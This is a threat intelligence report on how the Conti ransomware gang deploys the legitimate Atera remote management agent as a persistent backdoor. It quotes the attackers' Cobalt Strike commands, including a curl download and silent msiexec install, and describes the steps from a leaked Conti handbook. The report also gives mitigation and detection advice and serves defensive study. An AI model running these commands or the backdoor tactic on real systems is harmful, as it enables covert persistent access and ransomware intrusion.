Secret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent
By Vitali Kremez
This report is based on our actual proactive victim breach intelligence and subsequent incident response (not a simulated or sandbox environment) identified via unique high-value collections at AdvIntel.
Adversary Tactics Chain Flow:
Conti Access via TrickBot, Buer, BazarBackdoor, AnchorDNS
Cobalt Strike beacon
Atera Agent Installation
Persistence & Shell Execution to Survive Cobalt Strike detections
Adversaries leverage Cobalt Strike command-line interfaces to interact with systems and execute other software during the course of a ransomware operation.
What is Atera?
Atera is an IT management solution that enables monitoring, management, and automation of hundreds of SMB IT networks from a single console. Atera includes a remote control, patch management, discovery, inventory of IT assets, monitoring, security, backup, and more.
Deploying Atera Agent as "Backdoor"
The idea behind this tactic is to leveraging a legitimate remote management agent Atera to survive possible Cobalt Strike detections from the endpoint detection and response platform. Relying on the legitimate tool to achieve persistence is a core idea leverage by the ransomware pentesting team.
While reviewing Conti incidents that we proactively identified, monitored, and alerted via our threat prevention platform Andariel, AdvIntel has identified that Atera played the key role in allowing secret backdoor installations on the host right after the Conti gang obtained initial access via TrickBot, BazarBackdoor, AnchorDNS, or Cobalt Strike directly.
Conti Operational Handbook: Atera as Backdoor
The disgruntled Conti operator leaked the tactics matching our proactive cases.
The method includes the following steps as translated from the tutorial:
Registration of the agent access via the official website
Click on download and set up agent access with the script
Run the agent installation via the Cobalt Strike “shell atera_run.msi”
Observe the device beacon in the Atera system
Remove the installation script artifacts
I. Cobalt Strike command via curl command execution for Atera Agent installation.
shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1 II. Cobalt Strike command via the uploaded .msi installer script exported from the Atera Agent console
upload C:\programdata\setup_undefined.msi
shell setup_undefined.msi
Atera Agent "Backdoor" Relevancy
The Atera agent allows the following connection option for the ransomware groups to achieve persistence:
Splashtop
AnyDesk
TeamViewer
ScreenConnect
Additionally, the agent allows direct command-prompt and PowerShell shell execution into the agent-installed environment.
Operational Insight
The Atera Agent allowed the Conti gang to regain access to infected protected environments, especially environments that were equipped with more aggressive machine learning endpoint detection-and-response anti-virus products.
The benefit is obvious - once Conti receives the desired access to the trial version of Atera with the burner account they obtain a shell and backdoor access to the environment maintained by a legitimate software tool.
We asesses with high condence the theme of leveraging tooling around legitimate and trusted software as a backdoor will continue to be the tactics leveraged by the ransomware pentester groups based on their latest tactics.
In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to receive an agent installation script and console access. Therefore, this backdoor access is not a central compromise of Atera, but rather a registration loophole leveraged by the adversaries to obtain Atera trial access simply via anonymous emails.
Mitigation
Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts particularly those from C:\ProgramData and C:\Temp directory
Detection Methods
Command-line interface activities can be captured through proper logging of process execution with command-line arguments.
Reference
Tactic: T1059 Command and Scripting Interpreter
Tactic: T1127 Trusted Developer Utilities Proxy Execution
Our proprietary platform, Andariel, provides a mirrored view of criminal and botnet activity, which
supplies our users with predictive insight that are used to prevent intrusions from maturing
into large-scale threat events such as ransomware attacks.